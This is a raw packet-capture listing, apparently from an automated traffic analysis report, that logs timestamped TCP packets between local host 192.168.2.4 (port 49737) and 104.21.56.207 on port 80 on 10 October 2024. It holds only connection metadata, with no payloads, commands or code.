                                                                                                        Oct 10, 2024 08:57:59.387351036 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.387367010 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.387383938 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.387420893 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.388226986 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.388258934 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.388300896 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.388309956 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.388330936 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.388343096 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.388362885 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.388376951 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.388394117 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.388410091 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.388428926 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.388442993 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.388459921 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.388494015 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.430264950 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.430315971 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.430335999 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.430354118 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.430375099 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.430577040 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471092939 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471162081 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471180916 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471196890 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471215010 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471246958 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471281052 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471312046 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471345901 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471379995 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471443892 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471477032 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471483946 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471484900 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471519947 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471519947 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471529961 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471532106 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471563101 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471585989 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471596956 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471618891 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471628904 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471652985 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471664906 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471683979 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471695900 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471724987 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471729994 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471752882 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471762896 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471788883 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471796036 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471817017 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471852064 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.471926928 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471960068 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.471987963 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.472009897 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.472011089 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.472042084 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.472064972 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.472074986 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.472093105 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.472107887 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.472126961 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.472140074 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.472166061 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.472172022 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.472204924 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.472204924 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.472223043 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.472242117 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.472258091 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.472294092 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.472795963 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.472858906 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.472914934 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.472966909 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.472970009 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473001003 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473018885 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473032951 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473053932 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473067045 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473088026 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473098993 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473118067 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473133087 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473151922 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473166943 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473187923 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473218918 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473632097 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473680973 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473690987 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473716021 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473735094 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473764896 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473768950 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473798037 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473822117 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473829985 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473853111 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473862886 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473882914 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473895073 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473916054 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473927975 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473947048 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.473961115 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.473978043 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.474010944 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.474509954 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.474541903 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.474566936 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.474591970 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.474592924 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.474642038 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.474644899 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.474675894 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.474694967 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.474708080 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.474726915 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.474740982 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.474766016 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.474771976 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.474796057 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.474805117 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.474827051 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.474838972 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.474858046 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.474890947 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.475444078 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.475476980 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.475501060 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.475509882 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.475528955 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.475542068 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.475562096 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.475575924 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.475594997 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.475627899 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.516730070 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.516802073 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.516836882 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.516858101 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.516870022 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.516905069 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.516937971 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.516971111 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.517003059 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.517034054 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.517034054 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.517034054 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.517034054 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.517034054 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.517036915 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.517054081 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.517071962 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.517090082 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.517123938 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769309998 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769361973 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769418955 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769473076 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769506931 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769551039 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769566059 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769566059 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769566059 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769603014 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769603014 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769603014 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769639969 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769673109 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769706964 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769746065 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769778013 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769778013 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769778013 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769778013 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769800901 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769818068 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769851923 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769860983 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769886017 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769907951 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769921064 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769938946 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769954920 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.769974947 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.769988060 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770008087 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770037889 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770046949 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770078897 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770088911 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770113945 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770132065 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770145893 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770165920 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770180941 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770199060 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770214081 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770231962 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770246983 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770268917 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770279884 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770298958 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770313025 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770334959 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770366907 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770370007 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770402908 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770421028 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770436049 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770454884 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770467997 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770493984 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770499945 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770518064 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770546913 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770549059 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770580053 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770600080 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770612955 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770631075 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770646095 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770663977 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770680904 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770699024 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770714045 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770735025 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770747900 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770768881 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770781040 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770797968 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770813942 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770833015 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770847082 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770864964 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770879984 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770896912 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770912886 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770932913 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770932913 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770947933 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770962000 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770962954 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.770975113 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770989895 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.770991087 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771003962 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771018982 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771033049 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771034956 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771048069 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771064043 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771064043 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771079063 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771086931 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771092892 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771106958 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771121025 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771127939 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771135092 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771148920 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771162987 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771177053 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771192074 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771199942 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771199942 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771199942 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771209955 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771218061 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771225929 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771233082 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771248102 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771261930 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771265030 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771275997 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771291018 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771305084 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771317005 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771317005 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771321058 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771328926 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771336079 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771351099 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771364927 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771380901 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771368980 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771408081 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771425009 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771440029 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771455050 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771470070 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771483898 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771497965 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771512985 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771517992 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771517992 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771517992 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771517992 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.771521091 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771528006 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.771532059 CEST4973780192.168.2.4104.21.56.207
